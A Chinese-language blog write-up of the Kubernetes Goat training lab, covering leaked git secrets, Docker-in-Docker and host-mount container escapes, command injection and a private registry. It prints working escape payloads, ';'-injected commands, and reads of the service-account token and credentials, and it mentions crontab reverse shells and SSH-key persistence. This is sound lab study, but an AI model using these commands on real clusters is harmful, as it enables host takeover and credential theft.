<!DOCTYPE html>

<html theme="dark" showBanner="true" hasBanner="true" > 
<head>
  <link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/fontawesome.min.css" rel="stylesheet">
  <link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/brands.min.css" rel="stylesheet">
  <link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/solid.min.css" rel="stylesheet">
  <script src="/js/color.global.min.js" ></script>
  <script src="/js/load-settings.js" ></script>
  <head>
  <meta charset="utf-8">
  
  
  

  
  <title>kubernetes-goat | Licivo&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <link rel="preload" href="/css/fonts/Roboto-Regular.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/Roboto-Bold.ttf" as="font" type="font/ttf" crossorigin="anonymous">

  <meta name="description" content="前言把靶场在 vps 上搭建好，访问 1234 端口页面是这样的 第一关：Sensitive keys in codebases来到 1230端口，给出提示 1Welcome to the build code service. This service is built using containers with CI&#x2F;CD pipleines and modern toolset like G">
<meta property="og:type" content="article">
<meta property="og:title" content="kubernetes-goat">
<meta property="og:url" content="http://example.com/2026/02/06/kubernetes-goat/index.html">
<meta property="og:site_name" content="Licivo&#39;s Blog">
<meta property="og:description" content="前言把靶场在 vps 上搭建好，访问 1234 端口页面是这样的 第一关：Sensitive keys in codebases来到 1230端口，给出提示 1Welcome to the build code service. This service is built using containers with CI&#x2F;CD pipleines and modern toolset like G">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206134138.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206141706.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206144127.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206144357.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206145122.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206150311.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206152924.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260206164505.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260209082044.png">
<meta property="og:image" content="http://example.com/images/8622af0a5b1a12ec14b4b7d8d0cadaea.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260209100737.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260209112353.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260209102617.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260209104657.png">
<meta property="og:image" content="http://example.com/images/Pasted%20image%2020260209104820.png">
<meta property="article:published_time" content="2026-02-06T02:17:17.568Z">
<meta property="article:modified_time" content="2026-02-09T05:09:12.704Z">
<meta property="article:author" content="Licivo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/Pasted%20image%2020260206134138.png">
  
    <link rel="alternate" href="/atom.xml" title="Licivo's Blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/avatar.png">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 8.1.1"></head>

</head>
<body>
  
  
    
<div id="banner" class="">
  <img src="/images/banner1.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  
  <div id="main-grid" class="">
    <div id="nav" class="">
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/" style="display: flex; align-items: center; height: 100%; padding-left: 15px;">
      <img src="/images/avatar.png" 
           style="width: 32px; height: 32px; border-radius: 50%; object-fit: cover; border: 2px solid var(--color-primary); box-shadow: 0 2px 4px rgba(0,0,0,0.1); margin-right: 10px;">
      <span style="font-weight: bold; font-size: 1.15rem; letter-spacing: 0.5px;">
        Licivo's Blog
      </span>
    </a>
  </nav>
  
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>

  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="light-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M438.5-829.913v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-829.913Zm0 747.826v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-82.087ZM877.913-438.5h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537t29.476-12.174h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T877.913-438.5Zm-747.826 0h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T82.087-521.5h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T130.087-438.5Zm660.174-290.87-34.239 32q-12.913 12.674-29.565 12.174-16.653-.5-29.327-13.174-12.674-12.673-12.554-28.826.12-16.152 12.794-28.826l33-35q12.913-12.674 30.454-12.674t30.163 12.847q12.709 12.846 12.328 30.826-.38 17.98-13.054 30.653ZM262.63-203.978l-32 34q-12.913 12.674-30.454 12.674t-30.163-12.847q-12.709-12.846-12.328-30.826.38-17.98 13.054-30.653l33.239-31q12.913-12.674 29.565-12.174 16.653.5 29.327 13.174 12.674 12.673 12.554 28.826-.12 16.152-12.794 28.826Zm466.74 33.239-32-33.239q-12.674-12.913-12.174-29.565.5-16.653 13.174-29.327 12.673-12.674 28.826-13.054 16.152-.38 28.826 12.294l35 33q12.674 12.913 12.674 30.454t-12.847 30.163q-12.846 12.709-30.826 12.328-17.98-.38-30.653-13.054ZM203.978-697.37l-34-33q-12.674-12.913-13.174-29.945-.5-17.033 12.174-29.707t31.326-13.293q18.653-.62 31.326 13.054l32 34.239q11.674 12.913 11.174 29.565-.5 16.653-13.174 29.327-12.673 12.674-28.826 12.554-16.152-.12-28.826-12.794ZM480-240q-100 0-170-70t-70-170q0-100 70-170t170-70q100 0 170 70t70 170q0 100-70 170t-170 70Zm-.247-82q65.703 0 111.475-46.272Q637-414.544 637-480.247t-45.525-111.228Q545.95-637 480.247-637t-111.475 45.525Q323-545.95 323-480.247t45.525 111.975Q414.05-322 479.753-322ZM481-481Z"/></svg></span>
      <span class="dark-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M480.239-116.413q-152.63 0-258.228-105.478Q116.413-327.37 116.413-480q0-130.935 77.739-227.435t206.304-125.043q43.022-9.631 63.87 10.869t3.478 62.805q-8.891 22.043-14.315 44.463-5.424 22.42-5.424 46.689 0 91.694 64.326 155.879 64.325 64.186 156.218 64.186 24.369 0 46.978-4.946 22.609-4.945 44.413-14.076 42.826-17.369 62.967 1.142 20.142 18.511 10.511 61.054Q807.174-280 712.63-198.206q-94.543 81.793-232.391 81.793Zm0-95q79.783 0 143.337-40.217 63.554-40.218 95.793-108.283-15.608 4.044-31.097 5.326-15.49 1.283-31.859.805-123.706-4.066-210.777-90.539-87.071-86.473-91.614-212.092-.24-16.369.923-31.978 1.164-15.609 5.446-30.978-67.826 32.478-108.282 96.152Q211.652-559.543 211.652-480q0 111.929 78.329 190.258 78.329 78.329 190.258 78.329ZM466.13-465.891Z"/></svg></span>
    </a>

    
      <a id="nav-search-btn" class="nav-icon" title="Search" style="cursor: pointer;">
        <svg xmlns="http://www.w3.org/2000/svg" height="24px" viewBox="0 0 24 24" width="24px" fill="currentColor">
    <path d="M0 0h24v24H0V0z" fill="none"/>
    <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/>
</svg>

      </a>
    

    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS 订阅">
        <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M198-120q-25.846 0-44.23-18.384-18.384-18.385-18.384-44.23 0-25.846 18.384-44.23 18.384-18.385 44.23-18.385 25.846 0 44.23 18.385 18.384 18.384 18.384 44.23 0 25.845-18.384 44.23Q223.846-120 198-120Zm538.385 0q-18.846 0-32.923-13.769-14.076-13.769-15.922-33.23-8.692-100.616-51.077-188.654-42.385-88.039-109.885-155.539-67.5-67.501-155.539-109.885Q283-663.462 182.385-672.154q-19.461-1.846-33.23-16.23-13.769-14.385-13.769-33.846t14.076-32.922q14.077-13.461 32.923-12.23 120.076 8.692 226.038 58.768 105.961 50.077 185.73 129.846 79.769 79.769 129.846 185.731 50.077 105.961 58.769 226.038 1.231 18.846-12.538 32.922Q756.461-120 736.385-120Zm-252 0q-18.231 0-32.423-13.461t-18.653-33.538Q418.155-264.23 348.886-333.5q-69.27-69.27-166.501-84.423-20.077-4.462-33.538-18.961-13.461-14.5-13.461-33.346 0-19.076 13.884-33.23 13.884-14.153 33.115-10.922 136.769 15.384 234.384 112.999 97.615 97.615 112.999 234.384 3.231 19.23-10.538 33.115Q505.461-120 484.385-120Z"/></svg>
      </a>
    

    <div id="nav-menu-btn" class="nav-icon">
      <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M177.37-252.282q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Zm0-186.218q-17.453 0-29.477-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T177.37-521.5h605.26q17.453 0 29.477 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T782.63-438.5H177.37Zm0-186.217q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Z"/></svg>
    </div>
  </nav>
</navbar>

<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
    
      <a class="nav-dropdown-link" id="nav-mobile-search">Search</a>
    

    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS 订阅">RSS</a>
     
    </div>
</div>

<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
  // 在原有的 dropdownBtn 逻辑下方添加
let searchBtn = document.getElementById("nav-search-btn");
let searchForm = document.getElementById("search-form-wrap");
let searchClose = document.getElementById("search-close-btn");

if (searchBtn) {
  searchBtn.onclick = function() {
    searchForm.classList.remove("hidden");
    document.getElementById("search-input").focus(); // 自动聚焦输入框
  }
}

if (searchClose) {
  searchClose.onclick = function() {
    searchForm.classList.add("hidden");
  }
}

// 按下 ESC 键关闭搜索
document.addEventListener('keydown', function(e) {
  if (e.key === 'Escape') searchForm.classList.add("hidden");
});
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=/images/avatar.png></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">Licivo </div>
      <div class="dot"></div>
      <div class="subtitle">8bysnm@gmail.com </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/Licivo" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">分类</h3>
      <div class="category-box">
            <a class="category-link" href="/categories/Java-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                Java 反序列化
                <div class="category-count">6</div>
            </a>
        
            <a class="category-link" href="/categories/WEB%E5%AE%89%E5%85%A8/">
                WEB安全
                <div class="category-count">2</div>
            </a>
        
            <a class="category-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">
                 代码审计
                <div class="category-count">2</div>
            </a>
        
            <a class="category-link" href="/categories/%E4%BA%91%E5%AE%89%E5%85%A8/">
                 云安全
                <div class="category-count">1</div>
            </a>
        
            <a class="category-link" href="/categories/LLM%E5%AE%89%E5%85%A8/">
                LLM安全
                <div class="category-count">1</div>
            </a>
        </div>
    </div>
  </div>


    
      

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       


<article id="post-kubernetes-goat" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        kubernetes-goat
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2026-02-06T02:17:17.568Z" itemprop="datePublished">2026-02-06</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    未分类 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            3.2k 词 
          </div>

          
          <div class="need-seperator meta-info">
            <i class="fa-solid fa-fire-flame-curved" style="color: #ff5722; margin-right: 8px;"></i>
            <span id="busuanzi_container_page_pv" style="display: none;">
              <span id="busuanzi_value_page_pv"></span>
            </span>
          </div>
          
        </div>
        
      </header>

      <div class="e-content article-entry" itemprop="articleBody">
        
          <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>把靶场在 vps 上搭建好，访问 1234 端口页面是这样的<br><img src="/images/Pasted%20image%2020260206134138.png"></p>
<h1 id="第一关：Sensitive-keys-in-codebases"><a href="#第一关：Sensitive-keys-in-codebases" class="headerlink" title="第一关：Sensitive keys in codebases"></a>第一关：Sensitive keys in codebases</h1><p><img src="/images/Pasted%20image%2020260206141706.png"><br>来到 1230端口，给出提示</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Welcome to the build code service. This service is built using containers with CI/CD pipleines and modern toolset like Git, Docker, AWS, and many other.</span><br></pre></td></tr></table></figure>

<p>目录扫描下来有很多的&#x2F;.git  上工具git-dumper 下载源码<br><img src="/images/Pasted%20image%2020260206144127.png"><br>下载下来的文件<br><img src="/images/Pasted%20image%2020260206144357.png"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">log</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/Pasted%20image%2020260206145122.png"><br>这里提交了有关环境变量的内容，但是想再去查看的时候总是会有文件的缺失或者损坏，单独再下载下来</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl --create-dirs -o .git/objects/b9/e2b454e881360b9158698eca3456bea6c2b55b http://xxx.xxx.xxx.xxx:1230/.git/objects/b9/e2b454e881360b9158698eca3456bea6c2b55b</span><br><span class="line"></span><br><span class="line">git show d7c173ad183c574109cd5c4c648ffe551755b576</span><br></pre></td></tr></table></figure>
<p>来查看具体的内容<br><img src="/images/Pasted%20image%2020260206150311.png"></p>
<p>可以看到这里面所泄露的 aws 凭证</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">+aws_access_key_id = AKIVSHD6243H22G1KIDC</span><br><span class="line"></span><br><span class="line">+aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M</span><br><span class="line"></span><br><span class="line">+k8s_goat_flag = k8s-goat-51bc78332065561b0c99280f62510bcc</span><br></pre></td></tr></table></figure>

<p>接下来在靶场环境的内部，进入 pod</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> POD_NAME=$(kubectl get pods --namespace default -l <span class="string">&quot;app=build-code&quot;</span> -o jsonpath=<span class="string">&quot;&#123;.items[0].metadata.name&#125;&quot;</span>)</span><br></pre></td></tr></table></figure>
<p><strong>从 Kubernetes 集群里，找到带有 app&#x3D;build-code 标签的 Pod，把它的名字存到环境变量 POD_NAME 里</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl <span class="built_in">exec</span> -it <span class="variable">$POD_NAME</span> -- sh</span><br></pre></td></tr></table></figure>
<p>启动 shell，可以看到这些信息和泄露的信息一样的<br><img src="/images/Pasted%20image%2020260206152924.png"></p>
<h1 id="第二关：DIND-docker-in-docker-exploitation"><a href="#第二关：DIND-docker-in-docker-exploitation" class="headerlink" title="第二关：DIND (docker-in-docker) exploitation"></a>第二关：DIND (docker-in-docker) exploitation</h1><p>给出提示</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Most of the CI/CD and pipeline system which use Docker and build containers for you with in the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to host system.</span><br></pre></td></tr></table></figure>

<p>在 CI&#x2F;CD 流水线中，<strong>Docker-in-Docker (DinD)</strong> 的利用通常围绕着“容器逃逸”展开。利用的核心思路在于：如果容器能够运行 Docker 命令，那么它通常拥有某种形式的高级权限，通过这些权限我们可以反向控制宿主机。<br>通常有两种主要的利用场景，取决于流水线是如何实现的：</p>
<h3 id="1-挂载-Docker-Socket-的利用-最常见"><a href="#1-挂载-Docker-Socket-的利用-最常见" class="headerlink" title="1. 挂载 Docker Socket 的利用 (最常见)"></a>1. 挂载 Docker Socket 的利用 (最常见)</h3><p>很多所谓的 DinD 其实只是通过卷挂载（Volume Mount）将宿主机的 <code>/var/run/docker.sock</code> 映射到了容器内部。&#x2F;var&#x2F;run&#x2F;docker.sock是Docker守护进程(Docker daemon)默认监听的Unix域套接字(Unix domain socket)，假如被映射到容器内，那么我们就可以跟Docker daemon进行通信，从而执行一些命令。这意味着你在容器里运行的 <code>docker</code> 命令实际上是在<strong>宿主机</strong>上执行的。</p>
<h3 id="2-特权模式下的-DinD-利用-privileged"><a href="#2-特权模式下的-DinD-利用-privileged" class="headerlink" title="2. 特权模式下的 DinD 利用 (--privileged)"></a>2. 特权模式下的 DinD 利用 (<code>--privileged</code>)</h3><p>真正的 DinD 需要容器以 <code>--privileged</code> 模式启动。这种模式给了容器几乎所有的内核能力（Capabilities），包括直接访问硬件设备的权力。</p>
<p><strong>利用步骤：</strong></p>
<ol>
<li><strong>寻找宿主机磁盘设备：</strong> 在特权容器内，你可以看到宿主机的设备文件</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fdisk -l  <span class="comment"># 或者 ls /dev/sd*</span></span><br></pre></td></tr></table></figure>

<ol start="2">
<li><strong>手动挂载设备：</strong> 找到宿主机的根分区（通常是 <code>/dev/sda1</code> 或 <code>/dev/vda1</code>），将其挂载到容器内：</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> /mnt/host</span><br><span class="line">mount /dev/sda1 /mnt/host</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><strong>持久化：</strong> 通过访问 <code>/mnt/host/etc/crontab</code> 写入反弹 Shell，或者在 <code>/mnt/host/root/.ssh/authorized_keys</code> 写入你的公钥。</li>
</ol>
<h3 id="3-常见-payload-汇总"><a href="#3-常见-payload-汇总" class="headerlink" title="3. 常见 payload 汇总"></a>3. 常见 payload 汇总</h3><table>
<thead>
<tr>
<th><strong>场景</strong></th>
<th><strong>Payload 命令</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>Docker Socket</strong></td>
<td><code>docker run -v /:/mnt alpine chroot /mnt /bin/sh</code></td>
</tr>
<tr>
<td><strong>特权模式 (直接挂载)</strong></td>
<td><code>mkdir -p /m; mount /dev/sda1 /m; chroot /m</code></td>
</tr>
<tr>
<td><strong>利用 Cgroups (进阶)</strong></td>
<td>使用 <code>release_agent</code> 逃逸（如果内核版本较低且拥有 <code>SYS_ADMIN</code> 权限）</td>
</tr>
</tbody></table>
<p>来看到这关输入<br><img src="/images/Pasted%20image%2020260206164505.png"><br>用 mount 命令来查看当前主机的挂载<br><img src="/images/Pasted%20image%2020260209082044.png"><br>理论上来说这里应该是会存在 <code>/custom/docker/docker.sock</code> 的文件。但是这里靶场在搭建的时候出现了一些问题导致没有</p>
<p>接下来需要去下载一个 docker 镜像来指定使用 <code>docker.sock</code> 套接字<br>下载到 tmp 目录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz</span><br></pre></td></tr></table></figure>

<p>解压缩</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/</span><br></pre></td></tr></table></figure>
<p><img src="/images/8622af0a5b1a12ec14b4b7d8d0cadaea.png"></p>
<p>然后就可以利用 <code>docker.sock</code> 来访问宿主机系统并在宿主机上执行<code>docker</code>命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps</span><br></pre></td></tr></table></figure>

<p>如果在宿主机里有交互 shell 的话可以用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -v /:/host alpine <span class="built_in">chroot</span> /host /bin/sh</span><br></pre></td></tr></table></figure>
<p>来获取 root</p>
<h1 id="第三关：SSRF-in-the-Kubernetes-K8S-world"><a href="#第三关：SSRF-in-the-Kubernetes-K8S-world" class="headerlink" title="第三关：SSRF in the Kubernetes (K8S) world"></a>第三关：SSRF in the Kubernetes (K8S) world</h1><p><img src="/images/Pasted%20image%2020260209100737.png"><br>这个 SSRF 还是比较简单的，针对容器里的路径去读取容器内的内容</p>
<p>这里还可以考虑另一种思路，获取 token</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">; <span class="built_in">cat</span> /run/secrets/kubernetes.io/serviceaccount/token</span><br></pre></td></tr></table></figure>
<p><img src="/images/Pasted%20image%2020260209112353.png"><br>Token 是 Pod 与 Kubernetes <strong>API Server</strong> 通信的凭证。利用 <code>kubectl</code> 远程登录集群。<br>利用该 Token，攻击者可以尝试列出集群中的 <strong>Secrets</strong></p>
<h1 id="第四关：Container-escape-to-the-host-system"><a href="#第四关：Container-escape-to-the-host-system" class="headerlink" title="第四关：Container escape to the host system"></a>第四关：Container escape to the host system</h1><p>查看当前的挂载<br><img src="/images/Pasted%20image%2020260209102617.png"><br>注意这里有 <code>/host-system</code> ，在正常的容器里，文件系统是独立的<br>根据当前的路径，整个宿主机似乎都映射了进来</p>
<p>执行chroot &#x2F;host-system &#x2F;bin&#x2F;bash来实现逃逸</p>
<h1 id="第五关：Attacking-private-registry"><a href="#第五关：Attacking-private-registry" class="headerlink" title="第五关：Attacking private registry"></a>第五关：Attacking private registry</h1><p>来到环境这关是攻击私有仓库，<br>大多数情况下，每个组织都有自己的私有仓库。有时候会因为配置错误，导致仓库处于公共&#x2F;开放状态。另一方面来说，开发人员因为使用内部私有仓库，可能会在在容器镜像中存储一些敏感信息。</p>
<blockquote>
<p><code>API</code>文档参考：<a target="_blank" rel="noopener" href="https://docs.docker.com/registry/spec/api/">https://docs.docker.com/registry/spec/api/</a></p>
</blockquote>
<p>列出存储库<br><img src="/images/Pasted%20image%2020260209104657.png"><br>访问路径获取 <code>/v2/madhuakula/k8s-goat-users-repo/manifests/latest</code> 查看仓库的具体信息，审计其中的内容存在敏感信息泄露<br><img src="/images/Pasted%20image%2020260209104820.png"></p>

          
          <div style="margin-top: 50px;">
            <script src="https://giscus.app/client.js"
              data-repo="Licivo/Licivo.github.io"
              data-repo-id="R_kgDOOQU8CQ"
              data-category="Announcements"
              data-category-id="DIC_kwDOOQU8Cc4C0Pub"
              data-mapping="pathname"
              data-strict="0"
              data-reactions-enabled="1"
              data-emit-metadata="0"
              data-input-position="bottom"
              data-theme="preferred_color_scheme"
              data-lang="zh-CN"
              crossorigin="anonymous"
              async>
            </script>
          </div>
        
      </div>

          
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2026/02/06/k8s%20%E9%9B%86%E7%BE%A4%E5%AE%89%E5%85%A8/"
      title="K8S 集群安全"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        K8S 集群安全
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2026/01/21/ThinkPHP_5.0.23/"
      title="ThinkPHP_5.0.23"
     >

    <p class="title-text">
      
        ThinkPHP_5.0.23
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>




    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 Licivo<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>
<div class="footer-statistics" style="margin-top: 15px; font-size: 0.85rem; color: #888; text-align: center;">
  <span id="busuanzi_container_site_pv" style="display: none;">
    <i class="fa-solid fa-chart-line"></i> 总访问量: <span id="busuanzi_value_site_pv" style="color: var(--color-primary); font-weight: bold;"></span> 次
  </span>
  <span style="margin: 0 10px; opacity: 0.3;">|</span>
  <span id="busuanzi_container_site_uv" style="display: none;">
    <i class="fa-solid fa-users"></i> 总访客数: <span id="busuanzi_value_site_uv" style="color: var(--color-primary); font-weight: bold;"></span> 人
  </span>

  <div style="margin-top: 10px;">
    <a target="_blank" rel="noopener" href="https://info.flagcounter.com/xxxx" style="display:inline-block;">
      <img src="https://s11.flagcounter.com/mini/licivo/bg_FFFFFF/txt_000000/border_CCCCCC/flags_0/" alt="Flag Counter" border="0">
    </a>
    </div>
</div>
    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn hide" onclick="topFunction()">
        <i class="fa-solid fa-angle-up"></i>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.classList.remove('hide')
        } else {
            btn.classList.add('hide')
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>

  <script src="/js/light-dark-switch.js"></script>

  <div id="search-form-wrap" style="display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.6); backdrop-filter: blur(5px); z-index: 99999; justify-content: center; align-items: flex-start; padding-top: 80px;">
    <div class="search-container" style="background: var(--color-background, #fff); width: 90%; max-width: 600px; max-height: 80vh; border-radius: 16px; padding: 20px; box-shadow: 0 15px 35px rgba(0,0,0,0.2); display: flex; flex-direction: column; overflow: hidden;">
      <div class="search-header" style="display: flex; align-items: center; border-bottom: 1px solid rgba(0,0,0,0.1); padding-bottom: 15px; margin-bottom: 10px;">
        <input type="text" id="search-input" style="flex: 1; border: none; outline: none; font-size: 1.1rem; background: transparent; color: var(--color-text);" placeholder="搜索文章标题或内容...">
        <i id="search-close-btn" class="fa-solid fa-xmark" style="cursor: pointer; color: #999; font-size: 1.2rem; margin-left: 10px;"></i>
      </div>
      <div id="search-result" style="overflow-y: auto; flex: 1;">
        </div>
    </div>
  </div>

  <style>
    .search-result-list { list-style: none; padding: 5px; margin: 0; }
    .search-result-item { padding: 15px; margin-bottom: 12px; background: rgba(0,0,0,0.02); border-radius: 10px; transition: all 0.2s ease; border: 1px solid transparent; }
    .search-result-item:hover { background: rgba(0,0,0,0.04); box-shadow: 0 4px 12px rgba(0,0,0,0.08); transform: translateY(-2px); border-color: var(--color-primary); }
    .search-result-title { font-size: 1.1rem; font-weight: 600; color: var(--color-primary, #4a90e2); text-decoration: none; display: block; margin-bottom: 8px; }
    .search-result-content { font-size: 0.95rem; color: #666; line-height: 1.6; display: -webkit-box; -webkit-line-clamp: 2; -webkit-box-orient: vertical; overflow: hidden; }
    .search-keyword { color: #e91e63; background: rgba(233, 30, 99, 0.08); padding: 0 4px; border-radius: 4px; font-weight: bold; font-style: normal; }
    
    /* 深色模式适配 */
    [data-theme="dark"] .search-container { background: #222; border: 1px solid #444; }
